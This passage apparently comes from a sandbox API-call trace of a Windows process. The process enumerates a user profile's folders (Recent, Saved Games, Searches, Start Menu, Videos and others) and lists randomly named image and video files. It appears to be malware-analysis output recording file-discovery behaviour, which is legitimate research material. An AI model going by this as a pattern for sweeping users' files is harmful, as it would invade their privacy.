ftCreationTime.dwHighDateTime=0x1d5b69b, ftLastAccessTime.dwLowDateTime=0xd4d9780, ftLastAccessTime.dwHighDateTime=0x1d5c0ff, ftLastWriteTime.dwLowDateTime=0xd4d9780, ftLastWriteTime.dwHighDateTime=0x1d5c0ff, nFileSizeHigh=0x0, nFileSizeLow=0x18d8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ifqNKr.png", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa4ef0f0, ftCreationTime.dwHighDateTime=0x1d5b728, ftLastAccessTime.dwLowDateTime=0x14cb3170, ftLastAccessTime.dwHighDateTime=0x1d5b821, ftLastWriteTime.dwLowDateTime=0x14cb3170, ftLastWriteTime.dwHighDateTime=0x1d5b821, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IK1V", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x395f0a20, ftCreationTime.dwHighDateTime=0x1d5ba1f, ftLastAccessTime.dwLowDateTime=0xbebf5d10, ftLastAccessTime.dwHighDateTime=0x1d5b6d1, ftLastWriteTime.dwLowDateTime=0xbebf5d10, ftLastWriteTime.dwHighDateTime=0x1d5b6d1, nFileSizeHigh=0x0, nFileSizeLow=0xd056, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsesP.png", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70160590, ftCreationTime.dwHighDateTime=0x1d5c3c6, ftLastAccessTime.dwLowDateTime=0xeca92db0, ftLastAccessTime.dwHighDateTime=0x1d5c04e, ftLastWriteTime.dwLowDateTime=0xeca92db0, ftLastWriteTime.dwHighDateTime=0x1d5c04e, nFileSizeHigh=0x0, nFileSizeLow=0xb489, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="khhc3Ttgbyg.png", cAlternateFileName="KHHC3T~1.PNG")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10456c20, ftCreationTime.dwHighDateTime=0x1d5bd0c, ftLastAccessTime.dwLowDateTime=0xe693fd10, ftLastAccessTime.dwHighDateTime=0x1d5bbe9, ftLastWriteTime.dwLowDateTime=0xe693fd10, ftLastWriteTime.dwHighDateTime=0x1d5bbe9, nFileSizeHigh=0x0, nFileSizeLow=0x43e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M-KbgZCgiX ZQ5383.gif", cAlternateFileName="M-KBGZ~1.GIF")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67901f90, ftCreationTime.dwHighDateTime=0x1d5c0c0, ftLastAccessTime.dwLowDateTime=0x7a851290, ftLastAccessTime.dwHighDateTime=0x1d5c48a, ftLastWriteTime.dwLowDateTime=0x7a851290, ftLastWriteTime.dwHighDateTime=0x1d5c48a, nFileSizeHigh=0x0, nFileSizeLow=0x1484d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pT2jCSlE056d3.bmp", cAlternateFileName="PT2JCS~1.BMP")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57b3770, ftCreationTime.dwHighDateTime=0x1d5c3f6, ftLastAccessTime.dwLowDateTime=0x8b429110, ftLastAccessTime.dwHighDateTime=0x1d5c18e, ftLastWriteTime.dwLowDateTime=0x8b429110, ftLastWriteTime.dwHighDateTime=0x1d5c18e, nFileSizeHigh=0x0, nFileSizeLow=0x1648a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SIycULiQEhQ8CmPzS.jpg", cAlternateFileName="SIYCUL~1.JPG")) returned 1 [0091.023] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3d4b310, ftCreationTime.dwHighDateTime=0x1d5c001, ftLastAccessTime.dwLowDateTime=0x1c07bee0, ftLastAccessTime.dwHighDateTime=0x1d5bf56, ftLastWriteTime.dwLowDateTime=0x1c07bee0, ftLastWriteTime.dwHighDateTime=0x1d5bf56, nFileSizeHigh=0x0, nFileSizeLow=0x5cac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sq-jj8OfS5nH5F.jpg", cAlternateFileName="SQ-JJ8~1.JPG")) returned 1 [0091.023] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f732f20, ftCreationTime.dwHighDateTime=0x1d5be1d, ftLastAccessTime.dwLowDateTime=0x1a209b40, ftLastAccessTime.dwHighDateTime=0x1d5ba67, ftLastWriteTime.dwLowDateTime=0x1a209b40, ftLastWriteTime.dwHighDateTime=0x1d5ba67, nFileSizeHigh=0x0, nFileSizeLow=0x6d64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tIB-wQ8HCp.gif", cAlternateFileName="TIB-WQ~1.GIF")) returned 1 [0091.023] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x630dd2f0, ftCreationTime.dwHighDateTime=0x1d5be27, ftLastAccessTime.dwLowDateTime=0xf5afafb0, ftLastAccessTime.dwHighDateTime=0x1d5bae0, ftLastWriteTime.dwLowDateTime=0xf5afafb0, ftLastWriteTime.dwHighDateTime=0x1d5bae0, nFileSizeHigh=0x0, nFileSizeLow=0x167e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tyuELw6yN-Ep.bmp", cAlternateFileName="TYUELW~1.BMP")) returned 1 [0091.023] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8720ead0, ftCreationTime.dwHighDateTime=0x1d5c091, ftLastAccessTime.dwLowDateTime=0xb871aef0, ftLastAccessTime.dwHighDateTime=0x1d5bc3e, ftLastWriteTime.dwLowDateTime=0xb871aef0, ftLastWriteTime.dwHighDateTime=0x1d5bc3e, nFileSizeHigh=0x0, nFileSizeLow=0xfaaa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uloc.png", cAlternateFileName="")) returned 1 [0091.023] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99c4e330, ftCreationTime.dwHighDateTime=0x1d5c1e0, ftLastAccessTime.dwLowDateTime=0x443ae330, ftLastAccessTime.dwHighDateTime=0x1d5be87, ftLastWriteTime.dwLowDateTime=0x443ae330, ftLastWriteTime.dwHighDateTime=0x1d5be87, nFileSizeHigh=0x0, nFileSizeLow=0x15bff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xRR-s9IfhD.bmp", cAlternateFileName="XRR-S9~1.BMP")) returned 1 [0091.023] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41272ed0, ftCreationTime.dwHighDateTime=0x1d5c5bf, ftLastAccessTime.dwLowDateTime=0xfaca7c10, ftLastAccessTime.dwHighDateTime=0x1d5b8f5, ftLastWriteTime.dwLowDateTime=0xfaca7c10, ftLastWriteTime.dwHighDateTime=0x1d5b8f5, nFileSizeHigh=0x0, nFileSizeLow=0x6271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxHeC1KCTrrL.bmp", cAlternateFileName="ZXHEC1~1.BMP")) returned 1 [0091.023] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41272ed0, ftCreationTime.dwHighDateTime=0x1d5c5bf, ftLastAccessTime.dwLowDateTime=0xfaca7c10, ftLastAccessTime.dwHighDateTime=0x1d5b8f5, ftLastWriteTime.dwLowDateTime=0xfaca7c10, ftLastWriteTime.dwHighDateTime=0x1d5b8f5, nFileSizeHigh=0x0, nFileSizeLow=0x6271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxHeC1KCTrrL.bmp", cAlternateFileName="ZXHEC1~1.BMP")) returned 0 [0091.023] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.023] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.023] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0091.023] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.023] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.023] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.023] PathFindFileNameW (pszPath="") returned="" [0091.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41272ed0, ftCreationTime.dwHighDateTime=0x1d5c5bf, ftLastAccessTime.dwLowDateTime=0xfaca7c10, ftLastAccessTime.dwHighDateTime=0x1d5b8f5, ftLastWriteTime.dwLowDateTime=0xfaca7c10, ftLastWriteTime.dwHighDateTime=0x1d5b8f5, nFileSizeHigh=0x0, nFileSizeLow=0x6271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxHeC1KCTrrL.bmp", cAlternateFileName="ZXHEC1~1.BMP")) returned 0xffffffff [0091.023] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.024] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0091.024] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.024] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.024] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.024] PathFindFileNameW (pszPath="") returned="" [0091.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41272ed0, ftCreationTime.dwHighDateTime=0x1d5c5bf, ftLastAccessTime.dwLowDateTime=0xfaca7c10, ftLastAccessTime.dwHighDateTime=0x1d5b8f5, ftLastWriteTime.dwLowDateTime=0xfaca7c10, ftLastWriteTime.dwHighDateTime=0x1d5b8f5, nFileSizeHigh=0x0, nFileSizeLow=0x6271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxHeC1KCTrrL.bmp", cAlternateFileName="ZXHEC1~1.BMP")) returned 0xffffffff [0091.024] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.024] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0091.024] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.024] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.024] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.024] PathFindFileNameW (pszPath="") returned="" [0091.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.025] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.025] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.025] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0091.025] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.025] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.025] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0091.025] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.025] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.025] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.025] PathFindFileNameW (pszPath="") returned="" [0091.025] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.025] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.026] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.026] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0091.026] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0091.026] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0091.026] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.026] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.026] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0091.026] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.026] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.026] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.026] PathFindFileNameW (pszPath="") returned="" [0091.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0091.026] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.026] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0091.026] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.027] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.027] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.027] PathFindFileNameW (pszPath="") returned="" [0091.027] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0091.027] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0091.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.027] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.027] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.027] PathFindFileNameW (pszPath="") returned="" [0091.027] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0091.027] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0091.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.027] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.027] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.028] PathFindFileNameW (pszPath="") returned="" [0091.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fbc2590, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fbc2590, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.028] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fbc2590, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fbc2590, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.028] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa61eea00, ftCreationTime.dwHighDateTime=0x1d5c496, ftLastAccessTime.dwLowDateTime=0x74c9bb60, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x74c9bb60, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0xa08d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3uyQN.mp4", cAlternateFileName="")) returned 1 [0091.028] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.028] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9907bfd0, ftCreationTime.dwHighDateTime=0x1d5c474, ftLastAccessTime.dwLowDateTime=0x54529550, ftLastAccessTime.dwHighDateTime=0x1d5c02c, ftLastWriteTime.dwLowDateTime=0x54529550, ftLastWriteTime.dwHighDateTime=0x1d5c02c, nFileSizeHigh=0x0, nFileSizeLow=0x53cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GtTSym_ -.flv", cAlternateFileName="GTTSYM~1.FLV")) returned 1 [0091.028] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357573f0, ftCreationTime.dwHighDateTime=0x1d5be3d, ftLastAccessTime.dwLowDateTime=0x30c589f0, ftLastAccessTime.dwHighDateTime=0x1d5ba2b, ftLastWriteTime.dwLowDateTime=0x30c589f0, ftLastWriteTime.dwHighDateTime=0x1d5ba2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yo5RRMrTBRvZPTzk", cAlternateFileName="YO5RRM~1")) returned 1 [0091.028] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf366e0d0, ftCreationTime.dwHighDateTime=0x1d5bb93, ftLastAccessTime.dwLowDateTime=0x654aa400, 